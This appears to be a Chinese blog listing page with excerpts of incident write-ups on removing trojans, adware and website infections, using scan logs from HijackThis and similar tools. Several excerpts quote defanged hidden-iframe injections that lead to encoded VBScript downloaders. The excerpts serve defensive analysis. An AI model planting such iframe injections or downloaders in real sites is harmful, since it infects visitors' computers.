其他

endurer　原創2006-08-11　第1版一位網友的電腦，這幾天瑞星開機掃描總報告發現Backdoor.Gpigeon.uql。如：------------病毒名稱 處理結果 發現日期 路徑檔案病毒來源Backdoor.Gpigeon.uql 清除成功  2006-08-11 08:08 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/IEXPLORE.EXE本機Backdoor.Gpigeon.uql 清除成功 2006-08

fontsapcum.dll,aaudstum.sys,HBKernel.sys,Hev32_c.sys,Windows64.Sys等2endurer 原創2008-07-26 第1版從pe_xscan 的 log 中，我們可以看到惡意程式對IME管理程式ctfmon.exe進行了映像劫持，即： O26 - IFEO: ctfmon.exe ->

endurer 原創2006-12-07

endurer 原創2007-01-24 第1版該網站首頁中部被加入代碼：/-------＜iframe height=0 width=0 src="hxxp://www.g*ao**ju*n8***8*8.com/5**"＞＜/iframe＞-------/hxxp://www.g*ao**ju*n8***8*8.com/5**   的內容包含用escape()加密的VBScript代碼，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject

endurer  原創2006-08-21  第1版有網友反映：他的電腦，不管用什麼瀏覽器上網，總是會彈出奇怪的網頁，什麼都有。而且不是開網頁時彈網頁，是開了瀏覽器就彈，過一會彈一個，有時開個空白頁都彈。 用HijackThis掃描log，發現如下可疑項目：/---------O1 - Hosts: 127.255.255.255 serial.alcohol-soft.com O1 - Hosts: 127.255.255.255 www.alcohol-soft.com O1 -

{if(this.width>screen.width-500)this.width=screen.width-500;}" border="0"

endurer　原創2006-03-27　第1版今天一位同事說電腦工作不正常，請我幫忙看看。該機為TCL品牌機，作業系統為Windows XP SP2(5.1.2600)。開啟IE瀏覽器後，IE停止回應。我開了幾個IE都是如些。強行關閉IE，則explorer.exe也會自動終止。系統自動重新運行explorer.exe後系統反應很慢。用HijackThis掃描，發現了AdWare.HBang.e的檔案和項目： O2 - BHO: HBObject Class - {AE22AFE5-1EF4-

一、版本更新版本　　　　　　日期　　　　說明0.0.0001 beta3  2007-07-05　1、更換了嘗試以SYSTEM帳戶啟動並執行方法；2、支援檔案拖放；3、增加視窗置頂選項檔案說明符 : F:/masm32/works/FreeDLL/8.exe屬性 : A---語言 : 中文(中國)檔案版本 : 0.0.0001 beta3說明 : FreeDLL著作權 : PurpleEndurer備忘 : 產品版本 : 0.0.0001 beta3產品名稱 : FreeDLL公司名稱 :

http://news.csdn.net/news/newstopic/28/28077.shtml來自：程式員（二） 你適合當程式員嗎，你知道編程式是怎麼回事嗎？1、

遭遇 h.sys,GuiHelp.sys,iesuper.dll,jfrwdh.dll,pedadt.dll等endurer 原創2008-07-29 第1版一位網友說的他的電腦最近經常自動重啟，開機後360衛士就不斷有警報提示。請偶協助檢修。用 pe_xscan 掃描 log 並分析，發現如下可疑項：pe_xscan 08-07-02 by Purple Endurer2008-7-24 22:41:51Windows XP Service Pack 2(5.1.2600)MSIE:6.0.2

endurer 原創2007-06-30 第1版一位網友的電腦接入移動硬碟後，瑞星即時監控表徵圖消失，並彈出3個命令列程式視窗，內容為：/---ntsd: bad pid '0'ntsd: exiting - press enter --- ---/估計是移動硬碟中有病毒。請偶通過QQ遠程協助。下載 pe_xscan 掃描 log，發現如下可疑項（省略了一部分進程）：/===pe_xscan 07-06-23 by Purple Endurer2000-10-18 8:55:52Windows

遭遇PSW.Win32.WoWar,Trojan.Win32.MnLess,Trojan.IMMSG.Win32.TBMSG等endurer 原創2007-07-09 第1版一位網友說他的電腦中瑞星經常提示發現病毒，讓偶通過QQ幫他遠程協助。檢查瑞星的記錄，匯出一段：/---病毒名稱  處理結果    掃描方式  路徑 檔案Trojan.PSW.Win32.WoWar.sb  刪除成功    檔案監控    c:/documents and settings/user/local

endurer 原創2007-06-29 第1版瀏覽該網站時，Kaspersky報告：惡意指令碼: 拒絕訪問。檢查該網頁，發現代碼：/---＜iframe src=hxxp://x*x*.k*o*5***1.com/index.htm width=50 height=0＞＜/iframe＞---/hxxp://x*x*.k*o*5***1.com/index.htm　包含代碼：/---＜iframe src="hxxp://x*x*.k*o*5***1.com/vip.htm" height=0

endurer 原創2007-01-15 第2版 補充Kaspersky的反應2007-01-12 第1版網站的網頁被加入代碼：/------＜iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0＞＜/iframe＞------/sin**ze*.htm   Kaspersky 報為

endurer 原創2006-12-11 第1版　　在“應用程式捷徑存在安全隱患”一文中，我就提到過正在寫一個類型 HijackThis 的系統掃描程式。　　昨晚開始寫 HijackThis 的 O6 組，即 IE/Ineternet選項 部分。　　發現用不具有管理員權限的帳戶登入時，程式則無法讀取 HKEY-CURRENT-USER 中的與 IE/Ineternet 選項有關的索引值，而且傳回值是2（ERROR_FILE_NOT_FOUND），而不是5（ERROR_ACCESS_DENIED）

endurer 原創2006-11-21 第1版QQ收到如下資訊：/-----------寶貝喊！本室網址：hxxp://www.h*z**uptown.com/ui.asp＄y=3 遊客們速度拉滿 300人激情不斷，讓大家都享受一下異性誘惑的感覺!,不來你會後悔的哦~ -----------/開啟hxxp://www.h*z**uptown.com/ui.asp＄y=3，網頁標題為：偷情語音視訊交談室---建議登陸使用者使用顯示屏解析度（1024*768）為最佳。網頁末包含代碼：/------

endurer 原創2007-01-23 第1版網站首頁包含代碼：/-------＜iframe height="0" width="0" src="hxxp://www.race***s*wd.net.**/1**.htm"＞＜/iframe＞-------/1**.htm 包含VBScript指令碼程式，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 1.exe，儲存為

endurer　原創2006-08-13　第2版 補充一個漏網的2006-08-12　第1版　　今早一上網，就有網友求助。他電腦螢幕右下角的瑞星即時監控小傘表徵圖不見了，手動啟動也不行。　　通過QQ遠程協助，先運行 瑞星註冊表修複工具，發現 EXE檔案關聯 和 系統啟動項（即下面HijackThis的log中的F2項） 被修改了。　　到 http://endurer.ys168.com 下載了 Hijackthis 和 procview。　　運行 Hijackthis 掃描log 和

endurer 原創2006-12-10 第1版一位網友的電腦最近工作比較慢，讓偶幫忙檢修看看。到 http://endurer.ys168.com 下載 HijackThis 和 ProcView。先用 HijackThis 掃描 log，發現以下可疑項： /-------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2

endurer 原創2006-11-22 第1版該網站首頁首部被加入代碼：/-----------＜IFRAME src="hxxp://58***000.128**.to***for.com/x***skj.htm width=0 height=0＞＜/IFRAME＞-----------/x***skj.htm  的內容為escape()加密的VBScript代碼，功能為：利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下載檔案